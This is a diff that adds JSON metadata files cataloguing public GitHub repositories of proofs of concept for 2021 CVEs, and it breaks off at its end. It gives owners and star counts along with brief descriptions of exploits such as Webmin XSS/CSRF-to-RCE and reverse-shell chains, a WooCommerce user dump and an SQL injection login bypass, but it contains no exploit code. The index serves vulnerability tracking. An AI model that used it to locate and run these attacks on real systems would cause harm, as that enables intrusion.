b/2021/CVE-2021-32099.json new file mode 100644 index 0000000000..f0d3ee9caa --- /dev/null +++ b/2021/CVE-2021-32099.json @@ -0,0 +1,95 @@ +[ + { + "id": 447197307, + "name": "CVE-2021-32099", + "full_name": "ibnuuby\/CVE-2021-32099", + "owner": { + "login": "ibnuuby", + "id": 28418984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28418984?v=4", + "html_url": "https:\/\/github.com\/ibnuuby", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ibnuuby\/CVE-2021-32099", + "description": "CVE-2021-32099", + "fork": false, + "created_at": "2022-01-12T11:48:34Z", + "updated_at": "2023-08-04T05:22:54Z", + "pushed_at": "2022-01-12T11:49:20Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 450330045, + "name": "CVE-2021-32099_SQLi", + "full_name": "l3eol3eo\/CVE-2021-32099_SQLi", + "owner": { + "login": "l3eol3eo", + "id": 58173707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58173707?v=4", + "html_url": "https:\/\/github.com\/l3eol3eo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l3eol3eo\/CVE-2021-32099_SQLi", + "description": "CVE-2021-32099 SQL Injection allow attacker bypass login. From HTB with love", + "fork": false, + "created_at": "2022-01-21T02:43:20Z", + "updated_at": "2024-07-10T07:31:22Z", + "pushed_at": "2022-01-21T08:00:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466400226, + "name": "CVE-2021-32099", + "full_name": "akr3ch\/CVE-2021-32099", + "owner": { + "login": "akr3ch", + "id": 97300177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4", + "html_url": "https:\/\/github.com\/akr3ch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akr3ch\/CVE-2021-32099", + "description": "CVE-2021-32099", + "fork": false, + "created_at": "2022-03-05T08:53:45Z", + "updated_at": "2024-08-12T20:21:15Z", + "pushed_at": "2022-03-05T09:01:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32156.json b/2021/CVE-2021-32156.json new file mode 100644 index 0000000000..5e3b571022 --- /dev/null +++ b/2021/CVE-2021-32156.json @@ -0,0 +1,33 @@ +[ + { + "id": 361284441, + "name": "CVE-2021-32156", + "full_name": "Mesh3l911\/CVE-2021-32156", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32156", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature", + "fork": false, + "created_at": "2021-04-24T23:02:45Z", + "updated_at": "2022-04-06T22:11:24Z", + "pushed_at": "2021-04-26T01:46:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32157.json b/2021/CVE-2021-32157.json new file mode 100644 index 0000000000..892dc36752 --- /dev/null +++ b/2021/CVE-2021-32157.json @@ -0,0 +1,64 @@ +[ + { + "id": 361309279, + "name": "CVE-2021-32157", + "full_name": "Mesh3l911\/CVE-2021-32157", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32157", + "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature", + "fork": false, + "created_at": "2021-04-25T02:08:34Z", + "updated_at": "2022-04-06T22:12:02Z", + "pushed_at": "2021-04-26T01:46:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485596660, + "name": "CVE-2021-32157", + "full_name": "dnr6419\/CVE-2021-32157", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-32157", + "description": "Make it possible to build a vulnerable webmin virtual environment as a container using docker", + "fork": false, + "created_at": "2022-04-26T01:49:11Z", + "updated_at": "2022-04-26T06:43:32Z", + "pushed_at": "2022-04-26T02:03:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32158.json b/2021/CVE-2021-32158.json new file mode 100644 index 0000000000..10b2e48b3a --- /dev/null +++ b/2021/CVE-2021-32158.json @@ -0,0 +1,33 @@ +[ + { + "id": 361584351, + "name": "CVE-2021-32158", + "full_name": "Mesh3l911\/CVE-2021-32158", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32158", + "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Command Injection through the Webmin's Upload and Download feature", + "fork": false, + "created_at": "2021-04-26T01:42:19Z", + "updated_at": "2022-04-06T22:13:09Z", + "pushed_at": "2021-04-26T01:44:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32159.json b/2021/CVE-2021-32159.json new file mode 100644 index 0000000000..8b0ca1f31b --- /dev/null +++ b/2021/CVE-2021-32159.json @@ -0,0 +1,33 @@ +[ + { + "id": 361580646, + "name": "CVE-2021-32159", + "full_name": "Mesh3l911\/CVE-2021-32159", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32159", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injetion through the Webmin's Upload and Download feature", + "fork": false, + "created_at": "2021-04-26T01:23:16Z", + "updated_at": "2022-04-06T22:14:14Z", + "pushed_at": "2021-04-26T01:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32160.json b/2021/CVE-2021-32160.json new file mode 100644 index 0000000000..4ac0e76549 --- /dev/null +++ b/2021/CVE-2021-32160.json @@ -0,0 +1,33 @@ +[ + { + "id": 361281776, + "name": "CVE-2021-32160", + "full_name": "Mesh3l911\/CVE-2021-32160", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32160", + "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to create a privileged user through the Webmin's add users feature then getting a reverse shell through the Webmin's running process feature", + "fork": false, + "created_at": "2021-04-24T22:42:28Z", + "updated_at": "2022-04-06T22:15:57Z", + "pushed_at": "2021-04-26T01:46:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32161.json b/2021/CVE-2021-32161.json new file mode 100644 index 0000000000..aea62447e5 --- /dev/null +++ b/2021/CVE-2021-32161.json @@ -0,0 +1,33 @@ +[ + { + "id": 361587735, + "name": "CVE-2021-32161", + "full_name": "Mesh3l911\/CVE-2021-32161", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32161", + "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Command Injection through the Webmin's File Manager feature ", + "fork": false, + "created_at": "2021-04-26T01:59:44Z", + "updated_at": "2022-04-06T22:16:54Z", + "pushed_at": "2021-04-26T02:00:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32162.json b/2021/CVE-2021-32162.json new file mode 100644 index 0000000000..19cd2d0302 --- /dev/null +++ b/2021/CVE-2021-32162.json @@ -0,0 +1,33 @@ +[ + { + "id": 361589905, + "name": "CVE-2021-32162", + "full_name": "Mesh3l911\/CVE-2021-32162", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32162", + "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's File Manager feature", + "fork": false, + "created_at": "2021-04-26T02:10:43Z", + "updated_at": "2022-04-09T20:58:11Z", + "pushed_at": "2021-04-26T02:17:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3229.json b/2021/CVE-2021-3229.json new file mode 100644 index 0000000000..b49f35a6a1 --- /dev/null +++ b/2021/CVE-2021-3229.json @@ -0,0 +1,33 @@ +[ + { + "id": 336803155, + "name": "CVE-2021-3229", + "full_name": "fullbbadda1208\/CVE-2021-3229", + "owner": { + "login": "fullbbadda1208", + "id": 67869836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67869836?v=4", + "html_url": "https:\/\/github.com\/fullbbadda1208", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fullbbadda1208\/CVE-2021-3229", + "description": null, + "fork": false, + "created_at": "2021-02-07T14:12:27Z", + "updated_at": "2022-07-22T04:11:52Z", + "pushed_at": "2021-02-07T14:18:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32305.json b/2021/CVE-2021-32305.json new file mode 100644 index 0000000000..8264620632 --- /dev/null +++ b/2021/CVE-2021-32305.json @@ -0,0 +1,64 @@ +[ + { + "id": 607007482, + "name": "CVE-2021-32305", + "full_name": "sz-guanx\/CVE-2021-32305", + "owner": { + "login": "sz-guanx", + "id": 93511367, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93511367?v=4", + "html_url": "https:\/\/github.com\/sz-guanx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sz-guanx\/CVE-2021-32305", + "description": null, + "fork": false, + "created_at": "2023-02-27T05:38:27Z", + "updated_at": "2023-02-27T05:38:27Z", + "pushed_at": "2023-02-27T05:38:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736041344, + "name": "CVE-2021-32305-websvn-2.6.0", + "full_name": "FredBrave\/CVE-2021-32305-websvn-2.6.0", + "owner": { + "login": "FredBrave", + "id": 114189847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FredBrave\/CVE-2021-32305-websvn-2.6.0", + "description": "This is a exploit of CVE-2021-32305 a web vulnerability to command injection on search.php path, this exploit allows execute commands.", + "fork": false, + "created_at": "2023-12-26T20:20:00Z", + "updated_at": "2024-08-17T02:08:19Z", + "pushed_at": "2023-12-26T20:29:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32399.json b/2021/CVE-2021-32399.json new file mode 100644 index 0000000000..ed5f7ae9de --- /dev/null +++ b/2021/CVE-2021-32399.json @@ -0,0 +1,33 @@ +[ + { + "id": 476675393, + "name": "linux-4.19.72_CVE-2021-32399", + "full_name": "nanopathi\/linux-4.19.72_CVE-2021-32399", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2021-32399", + "description": null, + "fork": false, + "created_at": "2022-04-01T10:29:20Z", + "updated_at": "2022-04-01T10:37:11Z", + "pushed_at": "2022-12-09T13:39:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32471.json b/2021/CVE-2021-32471.json new file mode 100644 index 0000000000..9dc2654afe --- /dev/null +++ b/2021/CVE-2021-32471.json @@ -0,0 +1,39 @@ +[ + { + "id": 331595207, + "name": "turing-machine", + "full_name": "intrinsic-propensity\/turing-machine", + "owner": { + "login": "intrinsic-propensity", + "id": 77781776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77781776?v=4", + "html_url": "https:\/\/github.com\/intrinsic-propensity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intrinsic-propensity\/turing-machine", + "description": "A Python program implementing and exploiting the Minsky Turing machine considered in the paper \"Intrinsic Propensity for Vulnerability in Computers? Arbitrary Code Execution in the Universal Turing Machine\" as per CVE-2021-32471 (https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-32471)", + "fork": false, + "created_at": "2021-01-21T10:39:42Z", + "updated_at": "2024-10-21T09:40:20Z", + "pushed_at": "2022-03-28T05:19:18Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arbitrary-code-execution", + "minsky", + "turing-machine", + "universal-turing-machine", + "vulnerability" + ], + "visibility": "public", + "forks": 6, + "watchers": 76, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32537.json b/2021/CVE-2021-32537.json new file mode 100644 index 0000000000..e25a159bba --- /dev/null +++ b/2021/CVE-2021-32537.json @@ -0,0 +1,39 @@ +[ + { + "id": 375408417, + "name": "CVE-2021-32537", + "full_name": "0vercl0k\/CVE-2021-32537", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-32537", + "description": "PoC for CVE-2021-32537: an out-of-bounds memory access that leads to pool corruption in the Windows kernel.", + "fork": false, + "created_at": "2021-06-09T15:44:00Z", + "updated_at": "2024-08-12T20:13:47Z", + "pushed_at": "2021-06-26T18:31:23Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-32537", + "pool-corruption", + "realtek-driver", + "rtkvhd64", + "tvn-202106002" + ], + "visibility": "public", + "forks": 13, + "watchers": 57, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32644.json b/2021/CVE-2021-32644.json new file mode 100644 index 0000000000..3a552e0e95 --- /dev/null +++ b/2021/CVE-2021-32644.json @@ -0,0 +1,33 @@ +[ + { + "id": 395855471, + "name": "CVE-2021-32644", + "full_name": "dnr6419\/CVE-2021-32644", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-32644", + "description": "Ampache XSS ", + "fork": false, + "created_at": "2021-08-14T01:50:32Z", + "updated_at": "2021-11-03T06:08:02Z", + "pushed_at": "2021-11-03T06:07:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32648.json b/2021/CVE-2021-32648.json new file mode 100644 index 0000000000..9f004ed2f0 --- /dev/null +++ b/2021/CVE-2021-32648.json @@ -0,0 +1,64 @@ +[ + { + "id": 448021889, + "name": "CVE-2021-32648", + "full_name": "Immersive-Labs-Sec\/CVE-2021-32648", + "owner": { + "login": "Immersive-Labs-Sec", + "id": 79456607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4", + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/CVE-2021-32648", + "description": "Proof Of Concept code for OctoberCMS Auth Bypass CVE-2021-32648", + "fork": false, + "created_at": "2022-01-14T15:50:11Z", + "updated_at": "2024-06-26T04:28:08Z", + "pushed_at": "2022-01-14T16:03:50Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 450032325, + "name": "CVE-2021-32648", + "full_name": "daftspunk\/CVE-2021-32648", + "owner": { + "login": "daftspunk", + "id": 1392869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1392869?v=4", + "html_url": "https:\/\/github.com\/daftspunk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daftspunk\/CVE-2021-32648", + "description": "Patch your code for October CMS Auth Bypass CVE-2021-32648", + "fork": false, + "created_at": "2022-01-20T09:28:13Z", + "updated_at": "2022-01-20T09:30:12Z", + "pushed_at": "2022-01-20T11:10:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32682.json b/2021/CVE-2021-32682.json new file mode 100644 index 0000000000..298bec3e93 --- /dev/null +++ b/2021/CVE-2021-32682.json @@ -0,0 +1,33 @@ +[ + { + "id": 717130219, + "name": "CVE-2021-32682", + "full_name": "nickswink\/CVE-2021-32682", + "owner": { + "login": "nickswink", + "id": 57839593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57839593?v=4", + "html_url": "https:\/\/github.com\/nickswink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nickswink\/CVE-2021-32682", + "description": "elFinder Commands Injection (CVE-2021-32682)", + "fork": false, + "created_at": "2023-11-10T16:16:47Z", + "updated_at": "2023-11-10T16:27:59Z", + "pushed_at": "2023-11-10T16:28:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32708.json b/2021/CVE-2021-32708.json new file mode 100644 index 0000000000..4b3e50bb55 --- /dev/null +++ b/2021/CVE-2021-32708.json @@ -0,0 +1,33 @@ +[ + { + "id": 875233508, + "name": "CVE-2021-32708", + "full_name": "fazilbaig1\/CVE-2021-32708", + "owner": { + "login": "fazilbaig1", + "id": 25384256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25384256?v=4", + "html_url": "https:\/\/github.com\/fazilbaig1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fazilbaig1\/CVE-2021-32708", + "description": "Affected versions of this package are vulnerable to Race Condition. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.", + "fork": false, + "created_at": "2024-10-19T12:49:56Z", + "updated_at": "2024-10-19T12:51:26Z", + "pushed_at": "2024-10-19T12:51:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32724.json b/2021/CVE-2021-32724.json new file mode 100644 index 0000000000..310ec35458 --- /dev/null +++ b/2021/CVE-2021-32724.json @@ -0,0 +1,33 @@ +[ + { + "id": 434583285, + "name": "CVE-2021-32724-Target", + "full_name": "MaximeSchlegel\/CVE-2021-32724-Target", + "owner": { + "login": "MaximeSchlegel", + "id": 45755920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45755920?v=4", + "html_url": "https:\/\/github.com\/MaximeSchlegel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaximeSchlegel\/CVE-2021-32724-Target", + "description": null, + "fork": false, + "created_at": "2021-12-03T12:09:46Z", + "updated_at": "2021-12-08T16:08:05Z", + "pushed_at": "2021-12-08T16:08:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32789.json b/2021/CVE-2021-32789.json new file mode 100644 index 0000000000..3cda40f6ba --- /dev/null +++ b/2021/CVE-2021-32789.json @@ -0,0 +1,64 @@ +[ + { + "id": 603184920, + "name": "CVE-2021-32789", + "full_name": "and0x00\/CVE-2021-32789", + "owner": { + "login": "and0x00", + "id": 90927438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90927438?v=4", + "html_url": "https:\/\/github.com\/and0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/and0x00\/CVE-2021-32789", + "description": "💣 Wordpress WooCommerce users dump exploit.", + "fork": false, + "created_at": "2023-02-17T19:51:24Z", + "updated_at": "2024-08-28T17:01:04Z", + "pushed_at": "2023-02-17T20:06:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754784767, + "name": "CVE-2021-32789", + "full_name": "DonVorrin\/CVE-2021-32789", + "owner": { + "login": "DonVorrin", + "id": 113451397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113451397?v=4", + "html_url": "https:\/\/github.com\/DonVorrin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DonVorrin\/CVE-2021-32789", + "description": "Authenticated Blind SQL Injection. Wordpress woocommerce plugin versions >= 2.5.0", + "fork": false, + "created_at": "2024-02-08T19:02:17Z", + "updated_at": "2024-02-08T19:04:47Z", + "pushed_at": "2024-02-08T19:37:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3279.json b/2021/CVE-2021-3279.json new file mode 100644 index 0000000000..2224bb8b64 --- /dev/null +++ b/2021/CVE-2021-3279.json @@ -0,0 +1,33 @@ +[ + { + "id": 484741600, + "name": "CVE-2021-3279", + "full_name": "rafaelchriss\/CVE-2021-3279", + "owner": { + "login": "rafaelchriss", + "id": 86614504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86614504?v=4", + "html_url": "https:\/\/github.com\/rafaelchriss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rafaelchriss\/CVE-2021-3279", + "description": null, + "fork": false, + "created_at": "2022-04-23T12:30:21Z", + "updated_at": "2022-04-23T12:30:21Z", + "pushed_at": "2022-04-23T12:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32804.json b/2021/CVE-2021-32804.json new file mode 100644 index 0000000000..0dfc6878a2 --- /dev/null +++ b/2021/CVE-2021-32804.json @@ -0,0 +1,33 @@ +[ + { + "id": 401572813, + "name": "CVE-2021-32804", + "full_name": "yamory\/CVE-2021-32804", + "owner": { + "login": "yamory", + "id": 51432046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51432046?v=4", + "html_url": "https:\/\/github.com\/yamory", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yamory\/CVE-2021-32804", + "description": null, + "fork": false, + "created_at": "2021-08-31T04:32:38Z", + "updated_at": "2022-01-17T07:37:21Z", + "pushed_at": "2021-08-31T05:19:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3281.json b/2021/CVE-2021-3281.json new file mode 100644 index 0000000000..e7933be590 --- /dev/null +++ b/2021/CVE-2021-3281.json @@ -0,0 +1,33 @@ +[ + { + "id": 383067956, + "name": "CVE-2021-3281", + "full_name": "lwzSoviet\/CVE-2021-3281", + "owner": { + "login": "lwzSoviet", + "id": 30397594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30397594?v=4", + "html_url": "https:\/\/github.com\/lwzSoviet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lwzSoviet\/CVE-2021-3281", + "description": null, + "fork": false, + "created_at": "2021-07-05T08:25:26Z", + "updated_at": "2022-01-31T11:44:07Z", + "pushed_at": "2021-07-05T08:47:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32819.json 